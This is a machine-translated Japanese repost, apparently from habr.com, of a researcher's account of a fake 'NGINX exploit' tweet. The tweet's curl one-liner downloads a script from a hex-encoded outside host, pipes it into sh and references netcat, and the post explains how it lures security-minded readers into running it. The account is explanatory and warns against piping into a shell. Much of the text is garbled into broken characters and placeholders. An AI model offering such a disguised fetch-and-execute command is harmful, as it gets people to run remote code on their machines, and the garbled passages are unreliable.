ããŒãã 翻蚳ã:
TL;DR: ãããªãç¶æ³ã§ããsh ãŸã㯠bash ã§ãã¡ã€ã« ãã€ãã©ã€ã³ã䜿çšããªãã§ãã ããã ããã¯ã³ã³ãã¥ãŒã¿ã®å¶åŸ¡ã倱ãçŽ æŽãããæ¹æ³ã§ãã
31 æ XNUMX æ¥ã«äœæãããã³ãã㯠PoC ãšã¯ã¹ããã€ãã«é¢ããçãã¹ããŒãªãŒãå
±æããããšæããŸãã 圌ã¯ããã®ç¥ããã«å¿ããŠããã«çŸãã
CURL ã§ã®æ°ããé£èªåæè¡ã®éçºãçµããåŸãç§ã¯å ã®ãã€ãŒããåŒçšããçºèŠãããè匱æ§ãæªçšãããšæããã XNUMX è¡ã®ã³ãŒãã§æ§æããããå®çšç㪠PoC ãæŒæŽ©ãããŸããã ãã¡ãããããã¯å šãã®ãã³ã»ã³ã¹ã§ããã ç§ã¯ããã«æŽé²ãããŠãããããæ°åãªãã€ãŒããããã ãã ãããšæã£ãŠããŸããïŒãŸãïŒã
ãããã次ã«äœãèµ·ãããã¯æ³åã§ããŸããã§ããã ç§ã®ãã€ãŒãã®äººæ°ã¯æ¥äžæããŸããã é©ãã¹ãããšã«ãçŸæç¹ïŒã¢ã¹ã¯ã¯æé15æ00æ¥1æïŒã§ã¯ããããåœç©ã§ããããšã«æ°ã¥ããŠãã人ã¯ã»ãšãã©ããªãã å€ãã®äººããŸã£ãããã§ãã¯ããã«ãªãã€ãŒãããŸã (åºåãããçŸãã ASCII ã°ã©ãã£ãã¯ãè³è³ããããšã¯èšããŸã§ããªã)ã
ãããã©ãã»ã©çŸããããèŠãŠãã ããïŒ
ãããã®ã«ãŒããè²ã¯ãã¹ãŠçŽ æŽããããã®ã§ããããããã衚瀺ããã«ã¯ãã·ã³äžã§ã³ãŒããå®è¡ããå¿ èŠãããããšã¯æããã§ãã 幞ããªããšã«ããã©ãŠã¶ãåãããã«åäœããæ³çãªåé¡ã«å·»ã蟌ãŸããããªãã£ããšããäºå®ãšçžãŸã£ãŠããµã€ãã«åã蟌ãŸããã³ãŒãã¯ãè¿œå ã®ã³ãŒããã€ã³ã¹ããŒã«ãããå®è¡ãããããããšãªããåã«ãšã³ãŒåŒã³åºããè¡ãã ãã§ããã
ã¡ãã£ãšããäœè«ïŒ
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
瀟äŒé»åå·¥åŠ (SEE) - åãªããã£ãã·ã³ã°ã§ã¯ãããŸãã
ãã®å®éšã§ã¯ãå®å šæ§ãšèŠªãã¿ããããéèŠãªéšåãå ããŠããŸããã ãããã圌ã®æåã«ã€ãªãã£ããšæããŸãã ã³ãã³ã ã©ã€ã³ã¯ãã127.0.0.1ã(æ¢ç¥ã®ããŒã«ã«ãã¹ã) ãåç §ããããšã«ãããã»ãã¥ãªãã£ãæããã«æ瀺ããŠããŸãã Localhost ã¯å®å šã§ãããšèããããŠããããã®ããŒã¿ãã³ã³ãã¥ãŒã¿ããæµåºããããšã¯ãããŸããã
粟é床ã¯ãå®éšã® XNUMX çªç®ã«éèŠãª SEE èŠçŽ ã§ããã 察象èªè ã¯äž»ã«ã³ã³ãã¥ãŒã¿ ã»ãã¥ãªãã£ã®åºæ¬ã«ç²ŸéããŠãã人ã ã§æ§æãããŠãããããã³ãŒãã®äžéšã芪ãã¿ããã芪ãã¿ããã (ãããã£ãŠå®å šã§ãã) ããã«èŠããããã«ã³ãŒããäœæããããšãéèŠã§ããã å€ããšã¯ã¹ããã€ãã®æŠå¿µã®èŠçŽ ãåçšããããããçããæ¹æ³ã§çµã¿åãããããšã§ãéåžžã«æåããããšã蚌æãããŠããŸãã
以äžã¯ã¯ã³ã©ã€ããŒã®è©³çŽ°ãªåæã§ãã ãã®ãªã¹ãã«ãããã®ã¯ãã¹ãŠçãŠããŸã å粧åã®æ§è³ªã§ãããå®éã®æäœã«ã¯å®è³ªçã«äœãå¿ èŠãããŸããã
æ¬åœã«å¿
èŠãªã³ã³ããŒãã³ãã¯äœã§ãããã? ãã -gsS
, -O 0x0238f06a
, |sh
ãããŠWebãµãŒããŒèªäœãã Web ãµãŒããŒã«ã¯æªæã®ããåœä»€ã¯å«ãŸããŠããããåã«ã³ãã³ãã䜿çšã㊠ASCII ã°ã©ãã£ãã¯ã¹ãæäŸããŠããŸããã echo
ã«å«ãŸããã¹ã¯ãªãã㧠index.html
ã ãŠãŒã¶ãŒã次ã®è¡ãå
¥åãããšã |sh
éäžã§ã index.html
ããŒããããŠå®è¡ãããŸããã 幞ããªããšã«ãWeb ãµãŒããŒã®ç®¡çè
ã«ã¯æªæã¯ãããŸããã§ããã
-
../../../%00
â ãã£ã¬ã¯ããªãè¶ããããšãè¡šããŸãã -
ngx_stream_module.so
â ã©ã³ãã 㪠NGINX ã¢ãžã¥ãŒã«ãžã®ãã¹ã -
/bin/sh%00<'protocol:TCP'
- ããããç«ã¡äžãäºå®ã§ã/bin/sh
ã¿ãŒã²ãã ãã·ã³äžã§åºåã TCP ãã£ãã«ã«ãªãã€ã¬ã¯ãããŸãã -
-O 0x0238f06a#PLToffset
- ç§å¯ã®æåããµããªã¡ã³ã#PLToffset
ãPLT ã«äœããã®åœ¢ã§å«ãŸããŠããã¡ã¢ãª ãªãã»ããã®ããã«èŠããŸãã -
|sh;
- ããäžã€ã®éèŠãªæçã 次ã®å Žæã«ããæ»æçš Web ãµãŒããŒããã®ã³ãŒããå®è¡ããã«ã¯ãåºåã sh/bash ã«ãªãã€ã¬ã¯ãããå¿ èŠããããŸããã0x0238f06a
(2.56.240.x
); -
nc /dev/tcp/localhost
- netcat ãåç §ãããããŒ/dev/tcp/localhost
ãã¹ãŠãåã³å®å šã«èŠããããã«ã å®éãããã¯äœããããçŸããã®ã©ã€ã³ã«å«ãŸããŠããŸãã
ããã§ãäžè¡ã¹ã¯ãªããã®è§£èªãšã瀟äŒé»åå·¥åŠãïŒè€éãªãã£ãã·ã³ã°ïŒã®åŽé¢ã«ã€ããŠã®è°è«ãçµãããŸããã
WebãµãŒããŒã®èšå®ãšå¯Ÿç
ç§ã®è³Œèªè ã®å€§å€æ°ã¯æ å ±ã»ãã¥ãªãã£/ããã«ãŒã§ããããã賌èªè ãäœãã§ããããã« (ãããŠãèšå®ïŒã å®éšã¯ãŸã é²è¡äžã§ãããããããã§ãã¹ãŠã®èœãšãç©Žãåæããã€ããã¯ãããŸãããããµãŒããŒãå®è¡ããåŠçãããã€ããããŸãã
- ç¹å®ã®ãœãŒã·ã£ã« ãããã¯ãŒã¯ã§ã®é åžã®è©Šã¿ãç©æ¥µçã«ç£èŠããããŸããŸãªãã¬ãã¥ãŒ ãµã ãã€ã«ã眮ãæããŠããŠãŒã¶ãŒã«ãªã³ã¯ãã¯ãªãã¯ããããä¿ããŸãã
- Chrome/Mozilla/Safari ãªã©ããã·ã§ã« ã¹ã¯ãªããã衚瀺ãã代ããã«ãThugcrowd ã®ããã¢ãŒã·ã§ã³ ãããªã«ãªãã€ã¬ã¯ãããŸãã
- äŸµå ¥/é²éªšãªãããã³ã°ã®æçœãªå åãç£èŠããNSA ãµãŒããŒãžã®ãªã¯ãšã¹ãã®ãªãã€ã¬ã¯ããéå§ããŸã (ãã!)ã
- ãŠãŒã¶ãŒãéåžžã®ãã©ãŠã¶ãããã¹ãã«ã¢ã¯ã»ã¹ãããã¹ãŠã®ã³ã³ãã¥ãŒã¿ã«ãããã€ã®æšéŠ¬ãš BIOS ã«ãŒãããããã€ã³ã¹ããŒã«ããŸã (åè«ã§ã!)ã
ã¢ã³ãããŒã®ããäžéš
ãã®å Žåãç§ã®å¯äžã®ç®æšã¯ãApache ã®æ©èœã®äžéšãç¹ã«ãªã¯ãšã¹ãããªãã€ã¬ã¯ãããããã®åªããã«ãŒã«ãç¿åŸããããšã§ããããããŠã次ã®ããã«èããŸããã
NGINX ãšã¯ã¹ããã€ã (æ¬ç©!)
ã賌èªããŸã
åºæïŒ habr.com